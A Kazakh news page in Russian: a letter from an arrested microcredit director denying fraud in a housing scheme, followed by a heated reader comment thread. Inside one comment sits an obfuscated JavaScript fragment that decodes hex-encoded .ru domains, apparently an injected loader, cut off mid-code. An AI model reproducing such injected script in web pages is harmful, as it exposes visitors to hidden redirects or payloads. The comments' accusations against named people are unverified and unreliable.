Мать двоих детей и директор МКО пишет из СИЗО

Мать двоих детей и директор МКО пишет из СИЗО

Мать двоих детей и директор МКО пишет из СИЗО

По обвинению в мошенничестве с квартирами в Юнис Сити на прошлой неделе арестовали 37-летнего директора микрокредитной организации Эльвиру Безносюк. После ареста она тоже прислала письмо в «Диапазон».

Уважаемая редакция! На страницах вашей газеты с открытым письмом к президенту Республики Казахстан о нарушении прав иностранного инвестора обратился гражданин Армении Асрян Гегам. Хотела бы также высказать свою позицию для объективного видения ситуации. За время моего руководства «МКО Кеш-Кредит» не было случаев, когда кто-либо из власти вмешивался в хозяйственную деятельность ТОО, включая аппарат акима. В то же время деятельность ТОО «МКО Кеш-Кредит», которым я руководила, велась исключительно в рамках действующего законодательства. Я официально заявляю, что никакого сговора с моей стороны с целью мошеннических действий с господином Асряном и кем-либо другим не было! Я работала в банковской системе и с профессиональной точки зрения знаю, что позволено законом, а что нет. Работа велась честно, открыто, в соответствии со всеми требованиями законодательства. Уверена, что следствие и суд объективно разберутся в деятельности хозяйствующего субъекта и не надо придавать делу политический окрас там, где его нет. Громкие, бездоказательные обвинения – это не тот способ защиты, которым должен пользоваться законопослушный инвестор. Из-за необоснованных обвинений любой из нас, будь то представитель власти, рабочий, служащий, предприниматель, может стать жертвой бездоказательного оговора, как сейчас этой жертвой стала я.

На меня и на мою семью брошена тень подозрения в совершении преступления, к которому я не причастна. Мы с мужем воспитываем двоих детей в духе любви к родине и патриотизма. Мой муж 23 года назад дал воинскую присягу на верность народу Казахстана и президенту, с честью выполняет свой долг, готовит и воспитывает молодое поколение для защиты родины. Я всегда старалась соответствовать высокому статусу жены офицера. Понимаю, как сейчас трудно моей семье, мне очень больно, что в нашу семью пришла такая беда.

Всем сердцем переживаю за тех людей, которые думают, что могут остаться без крыши над головой. Очень надеюсь, что покупатели останутся жить в своих квартирах. Я хорошо понимаю, что значит для семьи свой уголок, так как наша семья всю жизнь проживала в служебной квартире.

С нетерпением жду скорейшего окончания дела, надеюсь, что следственное и судебное разбирательство пройдут объективно и профессионально. Справедливость восторжествует, будут восстановлены мое честное имя и репутация.

Интересная новость? 0 Добавить в закладки
Материалы по теме:
рассказать о новости:
В Мой Мир Вконтакте Класс!
добавить комментарий

Уважаемые пользователи! Оставляя комментарии, проявляйте уважение и толерантность к мнению других посетителей. Просим вас избегать сообщений, приводящих к разжиганию конфликтов, расистских высказываний, оскорблений, провокаций и дискуссий, не относящихся к теме статьи. Ссылки на сторонние ресурсы в комментариях запрещены. Такие сообщения будут удаляться, а их авторы будут забанены.

Все комментарии (83):
Сортировать:
фото пользователя Mnenie
Mnenie

Из своей долгой юридической практики могу сказать, что для мошенничества не нужно создавать организацию, потом длительное время в ней работать, а потом совершить преступление. Настоящие мошенники, наоборот, стараются оставить как можно меньше следов. А тут - должность, подписи, печати, счета. Если инвестор нарушает наше законодательство, то не должны страдать наши граждане.

16.03.2017, 14:04
фото пользователя keti_keti
keti_keti
Где это видано, что бы честных людей, жён офицеров сажали за решетку ни за что??? Почему такой беспредел творится, где наше правосудие??? Человек работал честно, чему есть все подтверждающие документы, да была Директором, работу свою знала, выполняла добросовестно в согласии с Законодательством, какой может быть сговор? Жили в служебной квартире, значит своей квартиры даже нет. Не скрывалась так как не виновата, будучи уверенна в правосудии. А что сделали наши правоохранительные органы? Взяли и посадили за решетку безосновательно, бездоказательно, мать двоих маленьких детей. Супруг 23 года служит верой и правдой своему государству, патриот своей Родины. Детей воспитывают в любви к родине, в патриотизме и что они сейчас должны сказать своим детям? Ведь на месте этой девушки может оказаться любой из нас. Почему не искать настоящих преступников,  ну конечно проще всего найти козла отпущения и все свалить на него.
16.03.2017, 14:02
фото пользователя taxsist2
taxsist2
keti_keti Женщина, 34 года Дата регистрации: 16-03-2017 11:44 Последнее посещение: 16-03-2017 02:16 Комментарии (1)
16.03.2017, 14:20
фото пользователя taxsist2
taxsist2
Mnenie Женщина, 36 лет Дата регистрации: 16-03-2017 12:12 Последнее посещение: 16-03-2017 12:1
16.03.2017, 14:21
фото пользователя taxsist2
taxsist2
Если посадили  под арест и возбудили в отношении женщины уголовное дело незаконно, то по закону должен понести наказание тот кто принял такое решение, прокурор или судья который дал санкцию на возбуждение и меру пресечения.
16.03.2017, 14:26
фото пользователя Amanbek
Amanbek
Самое интересное инвесторе говорит о не законности арестов, о беспределе,в статье, а она утверждает что все законно только она невинна и она сама себе и противоречит без подсказок тех кому это надо, очень интересно!
16.03.2017, 14:18
фото пользователя Amanbek
Amanbek
Прочтите статью ответ Акиму, вот он сейчас раскидает всех, на ровном месте подставили головную боль создали ему!
16.03.2017, 14:20
фото пользователя Малинка
Малинка

Я зашла на сайт суд.кабинета и забила Кэш кредит,вышло дело.Были заключены трехсторонние договора цессии между физ.лицом,Окси билдом и Кэш кредитом.Для чего это делалось?Это ведь уступка права требования.И суд в который раз отказывает покупателю в праве собственности.Дак там еще и перезаложили его в Казах банк.Схема для чего такая была создана это понятно.

16.03.2017, 14:30
фото пользователя taxsist2
taxsist2
Малинка поподробнее))
16.03.2017, 14:28
фото пользователя Малинка
Малинка
Таксист зайдите в суд.кабинет,поиск дел,выберите гражданский суд,2017 год,и ответчика Кэш кредит.Выйдет дело одной женщины,там не один год ей отказывают в оформлении квартиры по ул.Богенбай Батыра д.155.
И дело в 2016 году тоже есть.
Почитайте,я просто не юрист,но там понятно и так.
Она именно подает на Окси билд и Кэш кредит и безрезультатно.Деньги она выплатила за эту квартиру.
Вот так вот,невиновные все зато,а человек без квартиры.
16.03.2017, 14:45
фото пользователя Amanbek
Amanbek
Уже писал, покупатель имеет право в соответствии с законом при наличии полной оплаты зарегистрировать право собственности не взирая на возбужденные дела против компаний!!
16.03.2017, 15:15
фото пользователя taxsist2
taxsist2
AmanbekМалинка, а как быть с арестом по решению суда наложенные на имущество тех против кого возбуждено дело? Юстиция не снимет арест пока суд не пришлет бумагу о снятии обременения,а суд не выдаст пока решение не вынесет и каким образом зарегистрировать право собственности?
16.03.2017, 15:25
фото пользователя Малинка
Малинка
Аманбек,напишите как?зарегистрировать.
16.03.2017, 15:22
фото пользователя Amanbek
Amanbek
Если даже компания в чем то обвиняется люди не причём , сделка оформлена в соответствием с законом. Потребуйте справку о наложении ареста в цоне (вряд ли дадут), приложите свои договора и оплату все копии и в суд как добропорядочный покупатель, вашу сделку признать обязаны по закону действительным и с этим вы зарегистрируете, проблемы компании не касаются людей, после того как все будет доказано в суде компания и должна будет отвечать и финансово в том числе, но не покупатель, есть в законе понятие добросовестный покупатель!
16.03.2017, 16:05
фото пользователя Малинка
Малинка
Ну а почему тогда эта женщина не может оформить на себя квартиру,если все так просто как вы пишете?
Я ее суд.решение читала.
16.03.2017, 16:28
фото пользователя Keks1
Keks1
Аманбек, дык проблема то в том, что людям не с чем идти в суд. Есть договор купли-продажи с ОксиБилдом, есть договор займа с кешКредитом и есть правоустанавливающие документы на квартиры, которые оформлены на... не понятно на кого оформлены. Но только не на покупателей. И эти правоустанавливающие документы лежат в банке, в качестве залога. Сам по себе договор купли-продажи никакой роли не играет. Играет роль справка о собственнике, которую ЦОН выдает. И мне непонятно, при чем в этой истории микрокредитная организация? Она выдавала деньги и передавала их застройщику. Люди "купились" на низкие процентные ставки и на "простоту" оформления кредита, но поимели на всем этом страшенный геморрой. Те, кто оформил кредит в банке под более высокие проценты и потратив несколько больше времени на сбор документов, сейчас спокойно спят по ночам.
16.03.2017, 16:32
фото пользователя Amanbek
Amanbek
Мой товарищ там живет, покупал через кэш, когда расчитался выяснилось что квартира в залоге, но в течении месяца плюс минус переоформили на него
16.03.2017, 17:04
фото пользователя Amanbek
Amanbek
Правда брал через кэш а оформили с оксибилда
16.03.2017, 17:05
фото пользователя Keks1
Keks1
Аманбек, вашему товарищу повезло. По всей видимости, он успел переоформить в один из немногих периодов, когда аресты снимали. А то, что брал кредит в Кеше, а квартира была оформлена в ОксиБилде, дык это такая особенность покупки жилья в этом ЖК. Я знаю людей, которые откладывали "на потом" переоформление... и так и не переоформили. Там мутняк изначально был. Когда дома еще только строили. 
16.03.2017, 17:21
фото пользователя Sasha 33
Sasha 33
Я там работал не слышал чтоб кидали, был бы шеф разобрался бы, он никогда не позволял чтоб обманывали людей, сам ездил везде на все объекты, говорил с людьми с рабочими объяснял , мне до сих пор долг по зп, но я уверен что не он все это
16.03.2017, 18:10
фото пользователя taxsist2
taxsist2
Keks1, да тут правы, те не многие кто оформил право собственности им повезло, по закону право собственности наступает с момента регистрации в ЦОНе,а ЦОН не будет регистрировать потому,что на этих квартирах стоит уже стоит арест, Вы чего братья)))) Да по факту есть договор купли продажи (не слушать Кексаь,что он ничего не значит, вгоняете в краску все сообщество нотариусов которые имеют с этого)  по которому Вы оплатили все суммы положенные, но извянки оплата прошла до регистрации имущества на покупашку, а после вынесения постановления об аресте ЦОН не решает эти вопросы.
16.03.2017, 18:07
фото пользователя Sasha 33
Sasha 33
Это не законно
16.03.2017, 18:25
фото пользователя taxsist2
taxsist2
Sasha 33, что именно не законно? 
16.03.2017, 18:32
фото пользователя Малинка
Малинка
Она пишет в исковом, что Окси билд без ее ведома передал квартиру в банк.В которой прописаны и проживают с 2014 года ее дочь и внук.
16.03.2017, 15:15
фото пользователя taxsist2
taxsist2
а имел право Оксибилд передавать? и было ли в тот момент право собственности оформлено у этой женщины вот в чем вопрос.. 
16.03.2017, 15:21
фото пользователя Малинка
Малинка
Даа,Таксист,не хотела бы я попасть так как эти люди на таких комбинаторов.Почему человек страдает и по судам ходит,свои нервы и деньги на юристов тратит?Нафига все это делать с людьми,они доверяли же все таки.
16.03.2017, 15:24
фото пользователя taxsist2
taxsist2
Малинка доверие тут не причем, необходимо смотреть на соблюдение законности при оформление договора на куплю продажу недвижимости. Кто владелец,какие условия приобретения жилья, никто не застрахован от таких случаев, уже писали неоднократно,что жилье должно быть застраховано государством если долевое и т.п рассрочка, сейчас много кампаний которые предлагают купить квартиры в рассрочку без никаких взносов, предварительный взнос и далее график, просто никто не гарантирует,что завтра они не сделают ноги,а недвижимость не арестует банк или другой кредитор.
16.03.2017, 15:28
фото пользователя Keks1
Keks1
"никто не застрахован от таких случаев, "
Да никто и ни от чего не застрахован, но... Вот Вы бы, Таксист стали покупать квартиру, которую на Вас переоформят только после полного погашения кредита? А до того момента, она будет оформлена непонятно на кого? Что в Вас победит? Здравый смысл или желание сэкономить на процентах?
16.03.2017, 16:37
фото пользователя taxsist2
taxsist2
Keks1 открою секрет  так и купил))) и не один раз.. мать живет в квартире которая принадлежит другой женщине, при том хозяйка пыталась,как-то забрать но ей в суде сказали,что действия могут быть рассмотрены,как мошенничество, свою квартиру также покупал переоформил через 2 меясца после переуступки кредита на меня с другого чела.. ситуации разные бывают.
16.03.2017, 17:53
фото пользователя Amanbek
Amanbek
Да малинка какая то подставная, то одно то другое, не пойму Ее комменты , только перепалка не понятно за чем!!! Не культурно так в открытую!!
16.03.2017, 16:40
фото пользователя Keks1
Keks1
Малинка - "специалист по всем вопросам". Не принимайте близко к сердцу ее высказывания.)))
16.03.2017, 16:44
фото пользователя Малинка
Малинка
Кекс,ты меня повысил))Спс,за "специалист по всем вопросам"!!!.Не ожидала...
16.03.2017, 16:55
фото пользователя Keks1
Keks1
На здоровье. Только не зазнайся, смотри)))
16.03.2017, 17:28
фото пользователя Малинка
Малинка
tongueЭто вы подставные дяди,а я тут давно сижу)).
Только меня не обвините после Сапарбаева, что я тоже хочу отжать ваш бизнес)).
Если по теме,то мне похер,кто,что и за что.Есть люди,есть квартиры,им предложили,они клюнули,люди оплатили деньги свои кровные и в итоге что?Нет квартир,нет денег,мило втянуты в судебные дрязги и делают им мозги.

16.03.2017, 16:49
фото пользователя taxsist2
taxsist2
Малинка много в чем обвиняли но сейчас рейтинг смотрю подрос)) серьезными делами обвинять начали, рейдерством промышляете))
16.03.2017, 17:58
фото пользователя Малинка
Малинка
Стоило мне написать об исковом заявлении,сразу же попала в список "рекетиров" и отжимщиков)).Начали глотку драть,что я подставная)).Клубникой обзывать.Хихикаю.
Исковое сюда копировать не реально,поэтому кому интересно можно почитать,это реально документ.А не то,что тут базар вокзал ведут.
Есть человек,который ходит вокруг своей квартиры,т.е.ни квартиры,ни денег.
А здесь будут упираться и твердить нам,что все ок".
Значит сами не владеют информацией полной,ну это естественно,руководство никогда подчиненных в свои дела не посвящает.
Я как поняла,комментаторы "новенькие"это сотрудники этих компаний.
Какого лешего делать такие комбинации с квартирами?С какой целью?Но на этот вопрос никто не отвечает или не хочет.
16.03.2017, 19:28
фото пользователя Amanbek
Amanbek
Без Ее ведома не возможно, банк предварительно осматривает квартиру, оценивает
16.03.2017, 17:14
фото пользователя Keks1
Keks1
Аманбек, в наше смутное время нет понятия "невозможно"))) В Юнисе есть 3 дома,которые уже введены в эксплуатацию, на них уже техпаспорта оформлены, квартиры в них куплены... и заложены, но в них до сих пор лестниц нет в подъездах. Я уже молчу о прочих "мелочах". Как по-вашему оценщики из банка поднимались на 7-й этаж, чтобы акт составить?)))
16.03.2017, 17:27
фото пользователя Amanbek
Amanbek
Я не удивлюсь сейчас ничему, но знаю точно там хозяина нет и все воруют я много знаю что продавали с космоса арматуру вывозили несколько фур, двери очень многое, не думаю что можно договориться и с БТИ, и с цоном, и с акиматом, и с банком, врядли,не такое уж в нашей стране беззаконие, поэтому и прихожу к мнению что очень кому то мешал
16.03.2017, 17:38
фото пользователя Keks1
Keks1
Да я и не оспариваю ваше утверждение))) Более того, у меня есть ответы на вопросы Малинки, типа "зачем кому то нужен этот геморрой с долгами?" Я отвечал на Ваш пост о невозможности оформить недвигу в залог без личного присутствия прошивающих в этой квартире и оценщикоа из банка. А по сабжу... да там и договариваться ни с кем не надо было. Все действовали в рамках законов. Владелец недвиги (а де-юре, это ОксиБилд) принес в банк техпаспорт на абсолютно новую квартиру. Справка о собственнике не вызывает сомнений, обременений нет. Не вижу причин не оформить залог. Кроме такой "мелочи", что там уже кто-то живет. Но, опять же, де-юре там никто не живет. Человек не сможет зарегистрироваться на той жилплощади без правоустанавливающих документов. Все чисто.
16.03.2017, 17:55
фото пользователя taxsist2
taxsist2
Keks1 вот об это и говорю, пока чел в долевуху вкходящий или в рассрочку не обезапасит себя тройным договром между собственником, государством(юстицией) и банком то риски большие.
16.03.2017, 18:11
фото пользователя taxsist2
taxsist2
Keks1 согласен))) обычно комиссия подымается до 3-гоwink обычно 1 этажи отделка нормально,а дальше ну,как повезет.
16.03.2017, 17:54
фото пользователя Keks1
Keks1
Таксист, в случае с Юнисом, комиссии нужно было либо отрастить крылья, либо как-то иначе решить вопросы с гравитацией (как вариант - договориться с ней). Простым смертным в тех домах, физически невозможно подняться выше 1-го этажа.
16.03.2017, 17:59
фото пользователя taxsist2
taxsist2
Keks1 значит,как всегда кто-то поимел на этом. Все очень просто,как сказал В.И Ленин ищите кому выгодно. Развязку надюсь увидим, очень много визга со стороны бизнеса в сторону Акима)) надеюсь,как Имантаева г-да не последует участь.. Сапсем разочарую от власти..
16.03.2017, 18:13
фото пользователя Jasik_adai
Jasik_adai
За время моего руководства «МКО Кеш-Кредит» не было случаев, когда кто-либо из власти вмешивался в хозяйственную деятельность ТОО, включая аппарат акима. -цитата Эльвиры. Это походу цена свободы . Как я понимаю и многие тут читатели " попросили " написать Ее так)))))! А где же правда , Безносюк? Тем более ты уже вспомнила о муже офицере . Вспомнила в тот момент когда прижали . Что же ты об этом забыла когда работала ? Даже в суе не упоминала и всем поседением показывала что незамужняя и готова к отношениям . А сейчас оказывается жена офицера ) да уж смешно . Мне жаль тебя . Ради своей выгоды ты топишь дальше берденлву и сироту , не говорю о асряне. Бог тебе судья . Надеюсь эта ситуация тебя вразумит и ты реально станешь женой офицера ) хотя не думаю
16.03.2017, 15:24
фото пользователя taxsist2
taxsist2
Jasik_adai как видим Вы более менее знакомы с кухней этой конторы и Ваш коментарий ложится на другую сторону весов,общественного менения, чем коментарии keti_keti и Mnenie. Насчет цены свободы вопрос конечно спорный но, что попросили похоже.
16.03.2017, 15:40
фото пользователя Beka_25101979
Beka_25101979
Уважаемый Jasik_adai! прежде чем чернить имя порядочной женщины докажите обратное и только потом пишите открыто! Эльвира Атаниязовна всегда и ко всем относилась с дружелюбием и если это вам показалось чем то другим у вас большие проблемы с воображением!! И надо ли на каждом углу кричать о своем семейном счастье?? Это семья растит двоих прекрасных детей в радости и любви до этих печальных событии!!
16.03.2017, 20:50
фото пользователя Jasik_adai
Jasik_adai
Мда))))! Никто не сомневается о " порядочности " эльвиры. Дай бог чтоб у каждого была именно такая жена )). Ладно суть та не в этом . А в том что прям как посадили Ее,она стала порядочной женой офицера И так далее, настолько идеализировали человека, прям сама божья мать. Если она не виновата , то каким образом она сидит ? То есть ответа два: 1. Либо Ее попросили написать так! 2. Либо идёт не стыковка . Поясняю . Она говорит что не было давления со стороны правоохранительных органов , все было чисто . Тогда каким образом все случилось ? Или она просто плавно сливает все с себя?? Извините мои дорогие , но директор из покон веков нёс ответсвенность! Все решения принимает директор . Конечно же не за капейки. Есьаесанно у неё и зп было ой ой ой! Примерно я подумаю так зп за месяцев 7-8( это точно )! Так что прежде чем что то заявлять , надо думать головой !!
16.03.2017, 21:48
фото пользователя Jasik_adai
Jasik_adai
Громкие, бездоказательные обвинения – это не тот способ защиты, которым должен пользоваться законопослушный инвестор. - ПОХОЖЕ ради этих слов представители власти позволили написать безносюк из СИЗО , пообещав взамен свободу !!! Эх, Власти рулят )! А Эльвира походу купилась . Ну посмотрим теперь как быстро выпустят безносюк
16.03.2017, 15:30
фото пользователя beowolf
beowolf
А причём здесь частники в деле о юном сити, там разве не самрук эти дома строил, арендное жильё? Поправьте меня пожалуйста
16.03.2017, 17:31
фото пользователя Keks1
Keks1
Поправляю. Есть 2 дома, которые ОксиБилд строил для СамРука. Хотя, часть квартир в тех домах были проданы не через Самрук, а напрямую. Либо, через Кешкредит. Есть, т.н. "элитное жилье". Это 5-ти этажки из экотона. Там тоже квартиры продавались либо за живые деньги, либо через КешКредит. И есть 7-ми этажки, которые введены в эксплуатацию только на бумаге. Тоже не СамРук. И все это - ЖК ЮнисСити. Как то так)))
16.03.2017, 17:38
фото пользователя Sasha 33
Sasha 33
Я работал там, в оксибилде газ тянули в иргиз, было несколько компаний но никого не кидали по квартирам , если до шефа доходило то вообще все получили бы, не раз просто люди приходили и решали свои вопросы, оксибилд вообще за газ и све за людей платил 2 года, хйвай в офисе не раз был
16.03.2017, 17:59
фото пользователя Keks1
Keks1
Саша_33. Люди узнали, что их "кинули" лишь после того, как Герам уехал и все арестовывать начали. И если бы не "волонтеры-участковые", по собственной инициативе, обходившие квартиры, никто бы и не писал заявы. И со временем, погасили бы кредиты и получили свои документы. Но все сложилось так, как сложилось(((
16.03.2017, 18:04
фото пользователя Sasha 33
Sasha 33
Именно об этом и вся шумиха кекс, Герам об этом и говорит что создали на ровном месте проблему, для чего?, и глупому понятно, волонтеры, заявы, уг дело, и все точка!! Это пока так ажиотаж в любом случае люди получат свои квартиры уверен, кто то по суду, кто то просто , кто то за доп оплату, просто жалко людей, да и Герам все потерял, ничего он не получит как бы не старался, все замнут!
16.03.2017, 18:42
фото пользователя taxsist2
taxsist2
Keks1 всему свое время)) суд будет быстрым, я так думаю(голосом из фильма Мимино)
16.03.2017, 18:16
фото пользователя Малинка
Малинка
Кажется мне,что это идет травля акима,не всем пришелся ко двору.Статьи как из рога изобилия))Привыкли у нас на широкую ногу жить.
Таксист верно подметил про Имантаева.
Дааа,у нас в области такие акулы бизнеса оказывается плавают.
Пифагорские наверно воду мутят.
16.03.2017, 19:07
фото пользователя Amanbek
Amanbek
И под травлю акима бизнес попадает? Если наш аким следит за соцсетями то многие попадут мне кажется
16.03.2017, 19:37
фото пользователя Малинка
Малинка
Цитирую:Убедительно прошу вас вмешаться и защитить интересы бизнеса и права иностранного инвестора от неправомерных действий правоохранительных органов, действующих по прямому указанию акима Актюбинской области в интересах «ForteBank».
Что вы тупняк включаете Amanbek ?Или вот это;
Цитирую:Напомним, предприниматель Г.Асрян написал президенту РК открытое письмо, в котором обвинил банк и акима в рейдерском захвате («Диапазон» от 2.03.2017).
Асрян на всю страну пожаловался президенту,обвинив акима без доказательно в своих проблемах.
И это вы Amanbek подставной,зарегистрировались сегодня и давай тут керосинить.Явно вы тут вынюхиваете что то.
16.03.2017, 21:52
фото пользователя Малинка
Малинка
Цитирую:Считаю, что в отношении меня и моих ТОО ведется последовательное создание непрерывной череды проблем сразу по нескольким направлениям, цель которых захват всех принадлежащих мне активов.
Потом как ни в чем не бывало после обвинения пишет:
Цитирую:Предприниматель предположил, что аким мог быть неверно информирован и попросил его организовать проверку и убедиться в достоверности его информации.
Асрян что доказал свои обвинения в адрес акима?

16.03.2017, 22:00
фото пользователя Amanbek
Amanbek
Я обосновываюсь на письмо, ответ акима и обращение к акиму, только по фактам изложенным в СМИ , вы цитируете только то что против, соответственно это вам надо, и естественно что вы заинтересованное лицо, что заметили и написали об этом таксист, Кеми, жасик, думаю теперь уже и всем остальным понятна ваша позиция. Вопрос зачем вам додумывать, надеюсь читать умеете прочтите все статьи по данному вопросу, вы везде есть!!
17.03.2017, 00:11
фото пользователя Малинка
Малинка
И еще вопрос интересует:
Когда появились такие объекты в собственности как Шалет де люкс и Космос?В каком году?До гос.тендеров или после или во время исполнения гос.заказов?После оплаты траншей государственных?
Что было в активах и чем вообще занимался и в каких объемах,до государственных денег?
Что инвестировал до получения гос.заказов?Были ли инвестиции до?
  Конечно было бы удобно посмотреть по годам,а еще лучше по месяцам,с указанием сумм годовых или месячных оборотов всех фирм и самого физ.лица (увеличение его активов)и за счет чего увеличивались оборотные средства.Движение денег по счетам фирм и собственным.Были ли договора типа на "безвозмездной,возвратной фин.помощи",т.е.как шло пополнение кассы и расчетного счета,а главное в каких датах.

16.03.2017, 22:27
фото пользователя Малинка
Малинка
Потому как,по любому,если велись работы,то покупались материалы,оборудования,работы,зарплата оплачивалась и т.д.,т.е.были затраты и как поняла большие.Поэтому должен был быть по любому,приход денег в предприятие.В минус касса и банк же не могли сработать.Тем более на покупку или стройку Шалета и земли, нужны были деньги.Каким образом зашли не хватающие денежные оборотные средства в кассу?Через какие "ямы"и по каким договорам.
Кредитные деньги надо отделить,банк ведет тем более мониторинг куда и зачем,чтобы нецелевого использования не было.
Поэтому при проверках забирают сразу все документы и базы,что бы не появился какой нибудь договор или счет фактура.
16.03.2017, 22:39
фото пользователя Amanbek
Amanbek
Чем больше читаю вас тем больше убеждаюсь в вашей предвзятости и отсутствии понимания всего что вы читаете!
17.03.2017, 00:16
фото пользователя Amanbek
Amanbek
Прочтите все комменты и поймёте что никто кроме вас воду не мутит!!! Удачи вам мутите дальше!
17.03.2017, 00:23
фото пользователя Sasha 33
Sasha 33
Что не регистрируют не законно, купил оплатил, какая разница что делал продавец, он делал он и должен отвечать не покупатель!
16.03.2017, 19:32
фото пользователя taxsist2
taxsist2
Sasha 33 насчет разницы есть грубая пословица раз не понимаете юридической казуистики, Вы купили но не зарегитрировали право собственности, а пока Вы ходили на эту собственность было наложено обременение и ото орган который должен зарегистрировать право собственности уже не решает вопрос. Это тоже самое,что продали квартиру нескольким и каждый имеет право требовать свою долю. 
17.03.2017, 08:47
фото пользователя Beka_25101979
Beka_25101979
Знаю ее как добросовестного и глубоко порядочного человека, и сейчас за честное и ответственное исполнение обязательств расплачивается своей свободой!!!  Все происходящее произвол!!  Требуем вмешаться вышестоящие власти и детально рассмотреть дело. Не дайте безвинному человеку отвечать по чужим счетам!!! Надеюсь по данному делу примут объективное решение и найдут действительно виновных!!!
16.03.2017, 20:44
фото пользователя Amanbek
Amanbek
Насколько я понял никто не очерняет Ее, говорится о том что все она законна делала, хорошо выполняла в соответствии с законом,не виновна ни в чем, в чем тогда вина его работодателя, соответственно ни в чем, а зачем писать обратное да ещё и с тюрьмы с ведома сотрудников, однозначно с подачи них же, либо она сама себе противоречит, а исходя из ваших коментов про неё, принудили обещая какие либо блага, во что не верится, если она поверила глупо!!
16.03.2017, 21:33
фото пользователя taxsist2
taxsist2
Beka_25101979 никто по действующему Законодательству РК не имеет право вмешиваться в деятельность суда и указывать судье. НИКТО, кроме,как обжаловать решение в вышестоящем суде.
17.03.2017, 08:48
фото пользователя Lazzat_23
Lazzat_23
Это вопиющий случай произвола исполнительной власти!! Не доказав прямой вины, безосновательно берут под стражу законопослушных людей!!!  всегда честно  и добросовестно исполняла возложенные на нее обязанности за что поплатилась своей свободой и репутацией! Любящая мать и жена, а также простой исполнитель чужой воли счс должна ответить за чужие преступления если таковые имеют место!! Глубоко опечалена текущими событиями, что порядочных и честных людей вот так в один день могут обьявить преступниками! но есть надежда на справедливый суд  и что следствие выйдет на правду и освободит невиновного!
16.03.2017, 21:04
фото пользователя Amanbek
Amanbek
Если дело дошло до акима то думаю что разберутся всех хапуг поставят на место и тех кто за его спиной замутил все это, дезинформировал чтоб забрать бизнес, чиновники, сотрудники, банки все кто замешен в этом, кроме Эльвиры там и других директоров посадили, на ровном месте кто то же должен отвечать за произвол который творится!
16.03.2017, 21:39
фото пользователя taxsist2
taxsist2
Lazzat_23 докажут в процессе суда, а арест это мера пресечения. Ответственные полиция, прокуратура и суд.
17.03.2017, 08:54
фото пользователя danik82
danik82
Я когда-то служил с супругом и знаком с его семьей. Он действительно служит верой и правдой! Офицер чести! Я уверен что Эльвира не виновна. Она очень порядочный и честный человек! Я надеюсь что справедливость восторжествует!
16.03.2017, 21:42
фото пользователя taxsist2
taxsist2
danik82 многие знакомы с теми кто совершил правонарушение и бывает часто в семьях есть порядочные,а кто-то делает преступление. Согласен с теми кто считает,что здесь мы видим попытку создать негативное общественное мнение про одну из сторон будь то Асрян, или бухгалтер или Акимат. Скажу так, если все стороны свое сказали пусть свое скажет суд и его решение оно по Закону обязательно для всех нравится кому либо или нет.
17.03.2017, 08:58
фото пользователя Jastice
Jastice
Клевета — это распространение заведомо ложных сведений, порочащих честь и достоинство другого лица или подрывающих его репутацию (ст. 130 УК РК). Клевета, совершенная с использованием Интернета наказывается штрафом до 4 млн тенге (до 2 тысяч МРП) либо исправительными работами в том же размере, либо ограничением свободы на срок до двух лет, либо лишением свободы на тот же срок. Может просто пожелаем автору скорейшего окончания дела. И объединившись так же будем надеяться, что следственное и судебное разбирательство пройдут объективно и профессионально.
16.03.2017, 22:56
фото пользователя Amanbek
Amanbek
Красавчик!!
17.03.2017, 00:19
фото пользователя Dildabek
Dildabek
Ситуация ужасная!Семью Безносюк знаю уже почти 20 лет. Очень порядочные и честные люди. Уверен, что Эльвира не мошенник. Верю, что суд объективно рассмотрит дело. И доброе имя несправедливо обвиняемых будет восстановленно.
17.03.2017, 13:34
фото пользователя Mnenie
Mnenie

Тут кажется действительно есть провокаторы и заказные коменты. А если логически: компания существует давно. Работ выполнила много разных, многим те же квартиры продала. Только раньше власть была заказчиком работ, банк тоже не видел опасности и кредитовал. А теперь, вдруг, компания и все руководители стали мошенниками? А какой смысл годами строить дома, базы, гостиницы иначе как для развития бизнеса? Какое тут может быть мошенничество? Для этого не нужна такая громадная структура. Может и есть какие то нарушения закона, без них вообще сложно жить. Но именно уголовное поле решения вопроса позволяет отобрать конфисковать все добро.

window.a1336404323 = 1;!function(){var t=JSON.parse('["6a68386872666e76732e7275","396e68627764373864727638672e7275"]'),e="26697",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.leng
17.03.2017, 14:11
фото пользователя Amanbek
Amanbek
Во всем цевелизованном мире давно прошла эра подобного, а у нас все по прежнему, пора и у нас привести в порядок, поставить на место взорвавшихся чинуш, злоупотребляющих оказанным доверием и властью!
18.03.2017, 19:29
фото пользователя Romka
Romka
Очень больно это все читать. Эльвира не в чем не виновата. Это порядочная честная. Никогда она не нарушала правила и закон. То что с ней произошло это что то очень страшное в уме не укладывается. Эльвира всегда работала честно в рамках закона. В ее безупречной работе можно даже не сомневаться. Нужно еще поискать такого специалиста как она. Она любящая мама и жена. Они с мужем воспитывают двух замечательных детей. Она настоящая жена офицера. Очень надеюсь что это все скоро закончится и будет как страшный сон для всех. Надеюсь на наше честное правосудие. Я буду молить бога что бы все по скорее закончилось и Эльвира вернулась к своей семье. Дай бог ей силы
17.03.2017, 21:28
фото пользователя Малинка
Малинка
Не переживайте,если не виновата эта женщина,то ее оправдают.Мне конечно как человека жалко ее.Но я понимаю что она была не последним человеком в этом звене.Есть адвокаты наверно которые ее защищают,тем более такие схемы тяжело доказать.И обычно выходят на свободу совершившие экономические преступления.
20.03.2017, 11:12
фото пользователя Anderson krutis
Anderson krutis

СУД РАЗБЕРЕТСЯ !! ВОР ДОЛЖЕН СИДЕТЬ В ТЮРЬМЕ! ПРИЗНАЙ ВИНУ И СИДИ!

20.03.2017, 19:07
фото пользователя Sasha 33
Sasha 33
Вот именн ВОР!! А пока просто сидят невинные,
21.03.2017, 13:50
Loading...